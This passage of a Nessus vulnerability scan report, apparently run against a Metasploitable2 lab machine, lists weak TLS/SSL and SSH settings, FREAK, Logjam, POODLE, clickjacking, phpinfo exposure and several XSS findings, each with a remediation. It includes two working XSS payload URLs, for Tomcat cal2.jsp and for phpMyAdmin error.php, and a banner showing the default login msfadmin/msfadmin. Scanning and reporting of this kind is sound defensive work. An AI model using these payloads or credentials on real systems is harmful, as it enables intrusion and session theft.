Note: This is considerably easier to exploit if the attacker is on the same physical network.
See Also
Solution
Reconfigure the affected application, if possible to avoid the use of weak ciphers.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
References
XREF CWE:326
XREF CWE:327
XREF CWE:720
XREF CWE:753
XREF CWE:803
XREF CWE:928
XREF CWE:934
Plugin Information
Published: 2007/10/08, Modified: 2021/02/03
Plugin Output

tcp/25/smtp


Here is the list of weak SSL ciphers supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-RC2-CBC-MD5 0x04, 0x00, 0x80 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x02, 0x00, 0x80 RSA(512) RSA RC4(40) MD5 export
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EDH-RSA-DES-CBC-SHA 0x00, 0x15 DH RSA DES-CBC(56) SHA1
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export
ADH-DES-CBC-SHA 0x00, 0x1A DH None DES-CBC(56) SHA1
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export
DES-CBC-SHA 0x00, 0x09 RSA RSA DES-CBC(56) SHA1

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}
81606 - SSL/TLS EXPORT_RSA <= 512-bit Cipher Suites Supported (FREAK)
-
Synopsis
The remote host supports a set of weak ciphers.
Description
The remote host supports EXPORT_RSA cipher suites with keys less than or equal to 512 bits. An attacker can factor a 512-bit RSA modulus in a short amount of time.

A man-in-the middle attacker may be able to downgrade the session to use EXPORT_RSA cipher suites (e.g. CVE-2015-0204). Thus, it is recommended to remove support for weak cipher suites.
See Also
Solution
Reconfigure the service to remove support for EXPORT_RSA cipher suites.
Risk Factor
Medium
VPR Score
1.4
EPSS Score
0.9243
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
3.2 (CVSS2#E:U/RL:OF/RC:C)
References
BID 71936
CVE CVE-2015-0204
XREF CERT:243585
Plugin Information
Published: 2015/03/04, Modified: 2021/02/03
Plugin Output

tcp/25/smtp


EXPORT_RSA cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-DES-CBC-SHA 0x00, 0x08 RSA(512) RSA DES-CBC(40) SHA1 export
EXP-RC2-CBC-MD5 0x00, 0x06 RSA(512) RSA RC2-CBC(40) MD5 export
EXP-RC4-MD5 0x00, 0x03 RSA(512) RSA RC4(40) MD5 export

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}
104743 - TLS Version 1.0 Protocol Detection
-
Synopsis
The remote service encrypts traffic using an older version of TLS.
Description
The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a number of cryptographic design flaws. Modern implementations of TLS 1.0 mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are designed against these flaws and should be used whenever possible.

As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 and higher will no longer function properly with major web browsers and major vendors.

PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, 2018, except for POS POI terminals (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits.
See Also
Solution
Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)
CVSS v2.0 Base Score
6.1 (CVSS2#AV:N/AC:H/Au:N/C:C/I:P/A:N)
References
XREF CWE:327
Plugin Information
Published: 2017/11/22, Modified: 2023/04/19
Plugin Output

tcp/25/smtp

TLSv1 is enabled and the server supports at least one cipher.

104743 - TLS Version 1.0 Protocol Detection
-
Synopsis
The remote service encrypts traffic using an older version of TLS.
Description
The remote service accepts connections encrypted using TLS 1.0. TLS 1.0 has a number of cryptographic design flaws. Modern implementations of TLS 1.0 mitigate these problems, but newer versions of TLS like 1.2 and 1.3 are designed against these flaws and should be used whenever possible.

As of March 31, 2020, Endpoints that aren’t enabled for TLS 1.2 and higher will no longer function properly with major web browsers and major vendors.

PCI DSS v3.2 requires that TLS 1.0 be disabled entirely by June 30, 2018, except for POS POI terminals (and the SSL/TLS termination points to which they connect) that can be verified as not being susceptible to any known exploits.
See Also
Solution
Enable support for TLS 1.2 and 1.3, and disable support for TLS 1.0.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N)
CVSS v2.0 Base Score
6.1 (CVSS2#AV:N/AC:H/Au:N/C:C/I:P/A:N)
References
XREF CWE:327
Plugin Information
Published: 2017/11/22, Modified: 2023/04/19
Plugin Output

tcp/5432/postgresql

TLSv1 is enabled and the server supports at least one cipher.

35806 - Tomcat Sample App cal2.jsp 'time' Parameter XSS
-
Synopsis
The remote web server contains a JSP application that is affected by a cross-site scripting vulnerability.
Description
The remote web server includes an example JSP application, 'cal2.jsp', that fails to sanitize user-supplied input before using it to generate dynamic content. An unauthenticated, remote attacker can exploit this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site.
See Also
Solution
Upgrade to Apache Tomcat version 4.1.40 / 5.5.28 / 6.0.20.
Alternatively, apply the appropriate patch referenced in the vendor advisory or undeploy the Tomcat examples web application.
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)
VPR Score
2.2
EPSS Score
0.2082
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
References
Plugin Information
Published: 2009/03/09, Modified: 2021/01/19
Plugin Output

tcp/8180/www


Nessus was able to exploit the issue using the following URL :

http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp?time=8am%20STYLE%3dxss%3ae%2f%2a%2a%2fxpression%28try%7ba%3dfirstTime%7dcatch%28e%29%7bfirstTime%3d1%3balert%28%27tomcat_sample_cal2_xss2.nasl%27%29%7d%29%3b

42263 - Unencrypted Telnet Server
-
Synopsis
The remote Telnet server transmits traffic in cleartext.
Description
The remote host is running a Telnet server over an unencrypted channel.

Using Telnet over an unencrypted channel is not recommended as logins, passwords, and commands are transferred in cleartext. This allows a remote, man-in-the-middle attacker to eavesdrop on a Telnet session to obtain credentials or other sensitive information and to modify traffic exchanged between a client and server.

SSH is preferred over Telnet since it protects credentials from eavesdropping and can tunnel additional data streams such as an X11 session.
Solution
Disable the Telnet service and use SSH instead.
Risk Factor
Medium
CVSS v3.0 Base Score
6.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N)
CVSS v2.0 Base Score
5.8 (CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:N)
Plugin Information
Published: 2009/10/27, Modified: 2024/01/16
Plugin Output

tcp/23/telnet


Nessus collected the following banner from the remote Telnet server :

------------------------------ snip ------------------------------
_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


04cbebc48a57 login:
------------------------------ snip ------------------------------

85582 - Web Application Potentially Vulnerable to Clickjacking
-
Synopsis
The remote web server may fail to mitigate a class of web application vulnerabilities.
Description
The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions.

X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors.

Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, with increasing support among all major browser vendors, as a way to mitigate clickjacking and other attacks. The 'frame-ancestors' policy directive restricts which sources can embed the protected resource.

Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only mitigations for clickjacking, they are currently the most reliable methods that can be detected through automation. Therefore, this plugin may produce false positives if other mitigation strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any security-sensitive transactions.
See Also
Solution
Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response.
This prevents the page's content from being rendered by another site when using the frame or iframe HTML tags.
Risk Factor
Medium
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
References
XREF CWE:693
Plugin Information
Published: 2015/08/22, Modified: 2017/05/16
Plugin Output

tcp/80/www


The following pages do not use a clickjacking mitigation response header and contain a clickable event :

- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome

85582 - Web Application Potentially Vulnerable to Clickjacking
-
Synopsis
The remote web server may fail to mitigate a class of web application vulnerabilities.
Description
The remote web server does not set an X-Frame-Options response header or a Content-Security-Policy 'frame-ancestors' response header in all content responses. This could potentially expose the site to a clickjacking or UI redress attack, in which an attacker can trick a user into clicking an area of the vulnerable page that is different than what the user perceives the page to be. This can result in a user performing fraudulent or malicious transactions.

X-Frame-Options has been proposed by Microsoft as a way to mitigate clickjacking attacks and is currently supported by all major browser vendors.

Content-Security-Policy (CSP) has been proposed by the W3C Web Application Security Working Group, with increasing support among all major browser vendors, as a way to mitigate clickjacking and other attacks. The 'frame-ancestors' policy directive restricts which sources can embed the protected resource.

Note that while the X-Frame-Options and Content-Security-Policy response headers are not the only mitigations for clickjacking, they are currently the most reliable methods that can be detected through automation. Therefore, this plugin may produce false positives if other mitigation strategies (e.g., frame-busting JavaScript) are deployed or if the page does not perform any security-sensitive transactions.
See Also
Solution
Return the X-Frame-Options or Content-Security-Policy (with the 'frame-ancestors' directive) HTTP header with the page's response.
This prevents the page's content from being rendered by another site when using the frame or iframe HTML tags.
Risk Factor
Medium
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
References
XREF CWE:693
Plugin Information
Published: 2015/08/22, Modified: 2017/05/16
Plugin Output

tcp/8180/www


The following pages do not use a clickjacking mitigation response header and contain a clickable event :

- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/CookieExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestParamExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/SessionExample

11229 - Web Server info.php / phpinfo.php Detection
-
Synopsis
The remote web server contains a PHP script that is prone to an information disclosure attack.
Description
Many PHP installation tutorials instruct the user to create a PHP file that calls the PHP function 'phpinfo()' for debugging purposes. Various PHP applications may also include such a file. By accessing such a file, a remote attacker can discover a large amount of information about the remote web server, including :

- The username of the user who installed PHP and if they are a SUDO user.

- The IP address of the host.

- The version of the operating system.

- The web server version.

- The root directory of the web server.

- Configuration information about the remote PHP installation.
Solution
Remove the affected file(s).
Risk Factor
Medium
CVSS v3.0 Base Score
5.3 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2003/02/12, Modified: 2024/11/22
Plugin Output

tcp/80/www


Nessus discovered the following URLs that call phpinfo() :

- http://metasploitable2.sicurform/phpinfo.php
- http://metasploitable2.sicurform/mutillidae/phpinfo.php
51425 - phpMyAdmin error.php BBcode Tag XSS (PMASA-2010-9)
-
Synopsis
The remote web server hosts a PHP script that is prone to a cross- site scripting attack.
Description
The version of phpMyAdmin fails to validate BBcode tags in user input to the 'error' parameter of the 'error.php' script before using it to generate dynamic HTML.

An attacker may be able to leverage this issue to inject arbitrary HTML or script code into a user's browser to be executed within the security context of the affected site. For example, this could be used to cause a page with arbitrary text and a link to an external site to be displayed.
See Also
Solution
Upgrade to phpMyAdmin 3.4.0-beta1 or later.
Risk Factor
Medium
VPR Score
3.8
EPSS Score
0.0823
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
3.7 (CVSS2#E:H/RL:OF/RC:C)
References
BID 45633
CVE CVE-2010-4480
XREF EDB-ID:15699
XREF CWE:20
XREF CWE:74
XREF CWE:79
XREF CWE:442
XREF CWE:629
XREF CWE:711
XREF CWE:712
XREF CWE:722
XREF CWE:725
XREF CWE:750
XREF CWE:751
XREF CWE:800
XREF CWE:801
XREF CWE:809
XREF CWE:811
XREF CWE:864
XREF CWE:900
XREF CWE:928
XREF CWE:931
XREF CWE:990
Plugin Information
Published: 2011/01/06, Modified: 2022/04/11
Plugin Output

tcp/80/www


Nessus was able to exploit the issue using the following URL :

http://metasploitable2.sicurform/phpMyAdmin/error.php?type=phpmyadmin_pmasa_2010_9.nasl&error=%5ba%40https%3a%2f%2fwww.phpmyadmin.net%2fsecurity%2fPMASA-2010-9%2f%40_self%5dClick%20here%5b%2fa%5d
36083 - phpMyAdmin file_path Parameter Vulnerabilities (PMASA-2009-1)
-
Synopsis
The remote web server contains a PHP script that is affected by multiple issues.
Description
The version of phpMyAdmin installed on the remote host fails to sanitize user-supplied input to the 'file_path' parameter of the 'bs_disp_as_mime_type.php' script before using it to read a file and reporting it in dynamically-generated HTML. An unauthenticated, remote attacker may be able to leverage this issue to read arbitrary files, possibly from third-party hosts, or to inject arbitrary HTTP headers in responses sent to third-party users.

Note that the application is also reportedly affected by several other issues, although Nessus has not actually checked for them.
See Also
Solution
Upgrade to phpMyAdmin 3.1.3.1 or apply the patch referenced in the project's advisory.
Risk Factor
Medium
CVSS v2.0 Base Score
5.0 (CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
3.7 (CVSS2#E:U/RL:OF/RC:C)
References
BID 34253
XREF SECUNIA:34468
Plugin Information
Published: 2009/04/03, Modified: 2022/04/11
Plugin Output

tcp/80/www

49142 - phpMyAdmin setup.php Verbose Server Name XSS (PMASA-2010-7)
-
Synopsis
The remote web server contains a PHP application that has a cross- site scripting vulnerability.
Description
The setup script included with the version of phpMyAdmin installed on the remote host does not properly sanitize user-supplied input to the 'verbose server name' field.

A remote attacker could exploit this by tricking a user into executing arbitrary script code.
See Also
Solution
Upgrade to phpMyAdmin 3.3.7 or later.
Risk Factor
Medium
VPR Score
3.0
EPSS Score
0.0039
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
3.7 (CVSS2#E:H/RL:OF/RC:C)
References
CVE CVE-2010-3263
XREF TRA:TRA-2010-02
XREF CWE:20
XREF CWE:74
XREF CWE:79
XREF CWE:442
XREF CWE:629
XREF CWE:711
XREF CWE:712
XREF CWE:722
XREF CWE:725
XREF CWE:750
XREF CWE:751
XREF CWE:800
XREF CWE:801
XREF CWE:809
XREF CWE:811
XREF CWE:864
XREF CWE:900
XREF CWE:928
XREF CWE:931
XREF CWE:990
Plugin Information
Published: 2010/09/08, Modified: 2022/04/11
Plugin Output

tcp/80/www


By making a series of requests, Nessus was able to determine the
following phpMyAdmin installation is vulnerable :

http://metasploitable2.sicurform/phpMyAdmin/

10114 - ICMP Timestamp Request Remote Date Disclosure
-
Synopsis
It is possible to determine the exact time set on the remote host.
Description
The remote host answers to an ICMP timestamp request. This allows an attacker to know the date that is set on the targeted machine, which may assist an unauthenticated, remote attacker in defeating time-based authentication protocols.

Timestamps returned from machines running Windows Vista / 7 / 2008 / 2008 R2 are deliberately incorrect, but usually within 1000 seconds of the actual system time.
Solution
Filter out the ICMP timestamp requests (13), and the outgoing ICMP timestamp replies (14).
Risk Factor
Low
VPR Score
2.2
EPSS Score
0.0037
CVSS v2.0 Base Score
2.1 (CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N)
References
Plugin Information
Published: 1999/08/01, Modified: 2024/10/07
Plugin Output

icmp/0

The remote clock is synchronized with the local clock.

70658 - SSH Server CBC Mode Ciphers Enabled
-
Synopsis
The SSH server is configured to use Cipher Block Chaining.
Description
The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.

Note that this plugin only checks for the options of the SSH server and does not check for vulnerable software versions.
Solution
Contact the vendor or consult product documentation to disable CBC mode cipher encryption, and enable CTR or GCM cipher mode encryption.
Risk Factor
Low
CVSS v3.0 Base Score
3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)
VPR Score
1.4
EPSS Score
0.0307
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
1.9 (CVSS2#E:U/RL:OF/RC:C)
References
BID 32319
CVE CVE-2008-5161
XREF CERT:958563
XREF CWE:200
Plugin Information
Published: 2013/10/28, Modified: 2023/10/27
Plugin Output

tcp/22/ssh


The following client-to-server Cipher Block Chaining (CBC) algorithms
are supported :

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se

The following server-to-client Cipher Block Chaining (CBC) algorithms
are supported :

3des-cbc
aes128-cbc
aes192-cbc
aes256-cbc
blowfish-cbc
cast128-cbc
rijndael-cbc@lysator.liu.se
153953 - SSH Weak Key Exchange Algorithms Enabled
-
Synopsis
The remote SSH server is configured to allow weak key exchange algorithms.
Description
The remote SSH server is configured to allow key exchange algorithms which are considered weak.

This is based on the IETF draft document Key Exchange (KEX) Method Updates and Recommendations for Secure Shell (SSH) RFC9142. Section 4 lists guidance on key exchange algorithms that SHOULD NOT and MUST NOT be enabled. This includes:

diffie-hellman-group-exchange-sha1

diffie-hellman-group1-sha1

gss-gex-sha1-*

gss-group1-sha1-*

gss-group14-sha1-*

rsa1024-sha1

Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.
See Also
Solution
Contact the vendor or consult product documentation to disable the weak algorithms.
Risk Factor
Low
CVSS v3.0 Base Score
3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2021/10/13, Modified: 2024/03/22
Plugin Output

tcp/22/ssh


The following weak key exchange algorithms are enabled :

diffie-hellman-group-exchange-sha1
diffie-hellman-group1-sha1
71049 - SSH Weak MAC Algorithms Enabled
-
Synopsis
The remote SSH server is configured to allow MD5 and 96-bit MAC algorithms.
Description
The remote SSH server is configured to allow either MD5 or 96-bit MAC algorithms, both of which are considered weak.

Note that this plugin only checks for the options of the SSH server, and it does not check for vulnerable software versions.
Solution
Contact the vendor or consult product documentation to disable MD5 and 96-bit MAC algorithms.
Risk Factor
Low
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N)
Plugin Information
Published: 2013/11/22, Modified: 2016/12/14
Plugin Output

tcp/22/ssh


The following client-to-server Message Authentication Code (MAC) algorithms
are supported :

hmac-md5
hmac-md5-96
hmac-sha1-96

The following server-to-client Message Authentication Code (MAC) algorithms
are supported :

hmac-md5
hmac-md5-96
hmac-sha1-96

83875 - SSL/TLS Diffie-Hellman Modulus <= 1024 Bits (Logjam)
-
Synopsis
The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits.
Description
The remote host allows SSL/TLS connections with one or more Diffie-Hellman moduli less than or equal to 1024 bits. Through cryptanalysis, a third party may be able to find the shared secret in a short amount of time (depending on modulus size and attacker resources). This may allow an attacker to recover the plaintext or potentially violate the integrity of connections.
See Also
Solution
Reconfigure the service to use a unique Diffie-Hellman moduli of 2048 bits or greater.
Risk Factor
Low
CVSS v3.0 Base Score
3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v3.0 Temporal Score
3.2 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
4.5
EPSS Score
0.9403
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
1.9 (CVSS2#E:U/RL:OF/RC:C)
References
BID 74733
CVE CVE-2015-4000
XREF CEA-ID:CEA-2021-0004
Plugin Information
Published: 2015/05/28, Modified: 2024/09/11
Plugin Output

tcp/25/smtp


Vulnerable connection combinations :

SSL/TLS version : SSLv3
Cipher suite : TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
Diffie-Hellman MODP size (bits) : 512
Logjam attack difficulty : Easy (could be carried out by individuals)

SSL/TLS version : TLSv1.0
Cipher suite : TLS1_CK_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
Diffie-Hellman MODP size (bits) : 512
Logjam attack difficulty : Easy (could be carried out by individuals)
83738 - SSL/TLS EXPORT_DHE <= 512-bit Export Cipher Suites Supported (Logjam)
-
Synopsis
The remote host supports a set of weak ciphers.
Description
The remote host supports EXPORT_DHE cipher suites with keys less than or equal to 512 bits. Through cryptanalysis, a third party can find the shared secret in a short amount of time.

A man-in-the middle attacker may be able to downgrade the session to use EXPORT_DHE cipher suites. Thus, it is recommended to remove support for weak cipher suites.
See Also
Solution
Reconfigure the service to remove support for EXPORT_DHE cipher suites.
Risk Factor
Low
CVSS v3.0 Base Score
3.7 (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)
CVSS v3.0 Temporal Score
3.2 (CVSS:3.0/E:U/RL:O/RC:C)
VPR Score
4.5
EPSS Score
0.9403
CVSS v2.0 Base Score
2.6 (CVSS2#AV:N/AC:H/Au:N/C:N/I:P/A:N)
CVSS v2.0 Temporal Score
2.2 (CVSS2#E:U/RL:ND/RC:C)
References
BID 74733
CVE CVE-2015-4000
XREF CEA-ID:CEA-2021-0004
Plugin Information
Published: 2015/05/21, Modified: 2022/12/05
Plugin Output

tcp/25/smtp


EXPORT_DHE cipher suites supported by the remote server :

Low Strength Ciphers (<= 64-bit key)

Name Code KEX Auth Encryption MAC
---------------------- ---------- --- ---- --------------------- ---
EXP-EDH-RSA-DES-CBC-SHA 0x00, 0x14 DH(512) RSA DES-CBC(40) SHA1 export
EXP-ADH-DES-CBC-SHA 0x00, 0x19 DH(512) None DES-CBC(40) SHA1 export
EXP-ADH-RC4-MD5 0x00, 0x17 DH(512) None RC4(40) MD5 export

The fields above are :

{Tenable ciphername}
{Cipher ID code}
Kex={key exchange}
Auth={authentication}
Encrypt={symmetric encryption method}
MAC={message authentication code}
{export flag}
78479 - SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
-
Synopsis
It is possible to obtain sensitive information from the remote host with SSL/TLS-enabled services.
Description
The remote host is affected by a man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
MitM attackers can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

As long as a client and service both support SSLv3, a connection can be 'rolled back' to SSLv3, even if TLSv1 or newer is supported by the client and service.

The TLS Fallback SCSV mechanism prevents 'version rollback' attacks without impacting legacy clients; however, it can only protect connections when the client and service support the mechanism. Sites that cannot disable SSLv3 immediately should enable this mechanism.

This is a vulnerability in the SSLv3 specification, not in any particular SSL implementation. Disabling SSLv3 is the only way to completely mitigate the vulnerability.
See Also
Solution
Disable SSLv3.

Services that must support SSLv3 should enable the TLS Fallback SCSV mechanism until SSLv3 can be disabled.
Risk Factor
Medium
CVSS v3.0 Base Score
3.4 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)
CVSS v3.0 Temporal Score
3.1 (CVSS:3.0/E:P/RL:O/RC:C)
VPR Score
5.1
EPSS Score
0.942
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
3.4 (CVSS2#E:POC/RL:OF/RC:C)
References
BID 70574
CVE CVE-2014-3566
XREF CERT:577193
Plugin Information
Published: 2014/10/15, Modified: 2023/06/23
Plugin Output

tcp/25/smtp


Nessus determined that the remote server supports SSLv3 with at least one CBC
cipher suite, indicating that this server is vulnerable.

It appears that TLSv1 or newer is supported on the server. However, the
Fallback SCSV mechanism is not supported, allowing connections to be "rolled
back" to SSLv3.

78479 - SSLv3 Padding Oracle On Downgraded Legacy Encryption Vulnerability (POODLE)
-
Synopsis
It is possible to obtain sensitive information from the remote host with SSL/TLS-enabled services.
Description
The remote host is affected by a man-in-the-middle (MitM) information disclosure vulnerability known as POODLE. The vulnerability is due to the way SSL 3.0 handles padding bytes when decrypting messages encrypted using block ciphers in cipher block chaining (CBC) mode.
MitM attackers can decrypt a selected byte of a cipher text in as few as 256 tries if they are able to force a victim application to repeatedly send the same data over newly created SSL 3.0 connections.

As long as a client and service both support SSLv3, a connection can be 'rolled back' to SSLv3, even if TLSv1 or newer is supported by the client and service.

The TLS Fallback SCSV mechanism prevents 'version rollback' attacks without impacting legacy clients; however, it can only protect connections when the client and service support the mechanism. Sites that cannot disable SSLv3 immediately should enable this mechanism.

This is a vulnerability in the SSLv3 specification, not in any particular SSL implementation. Disabling SSLv3 is the only way to completely mitigate the vulnerability.
See Also
Solution
Disable SSLv3.

Services that must support SSLv3 should enable the TLS Fallback SCSV mechanism until SSLv3 can be disabled.
Risk Factor
Medium
CVSS v3.0 Base Score
3.4 (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N)
CVSS v3.0 Temporal Score
3.1 (CVSS:3.0/E:P/RL:O/RC:C)
VPR Score
5.1
EPSS Score
0.942
CVSS v2.0 Base Score
4.3 (CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N)
CVSS v2.0 Temporal Score
3.4 (CVSS2#E:POC/RL:OF/RC:C)
References
BID 70574
CVE CVE-2014-3566
XREF CERT:577193
Plugin Information
Published: 2014/10/15, Modified: 2023/06/23
Plugin Output

tcp/5432/postgresql


Nessus determined that the remote server supports SSLv3 with at least one CBC
cipher suite, indicating that this server is vulnerable.

It appears that TLSv1 or newer is supported on the server. However, the
Fallback SCSV mechanism is not supported, allowing connections to be "rolled
back" to SSLv3.

42057 - Web Server Allows Password Auto-Completion
-
Synopsis
The 'autocomplete' attribute is not disabled on password fields.
Description
The remote web server contains at least one HTML form field that has an input of type 'password' where 'autocomplete' is not set to 'off'.

While this does not represent a risk to this web server per se, it does mean that users who use the affected forms may have their credentials saved in their browsers, which could in turn lead to a loss of confidentiality if any of them use a shared host or if their machine is compromised at some point.
Solution
Add the attribute 'autocomplete=off' to these fields to prevent browsers from caching credentials.
Risk Factor
Low
Plugin Information
Published: 2009/10/07, Modified: 2023/07/17
Plugin Output

tcp/80/www

Page : /phpMyAdmin/
Destination Page: /phpMyAdmin/index.php

Page : /phpMyAdmin/index.php
Destination Page: /phpMyAdmin/index.php

42057 - Web Server Allows Password Auto-Completion
-
Synopsis
The 'autocomplete' attribute is not disabled on password fields.
Description
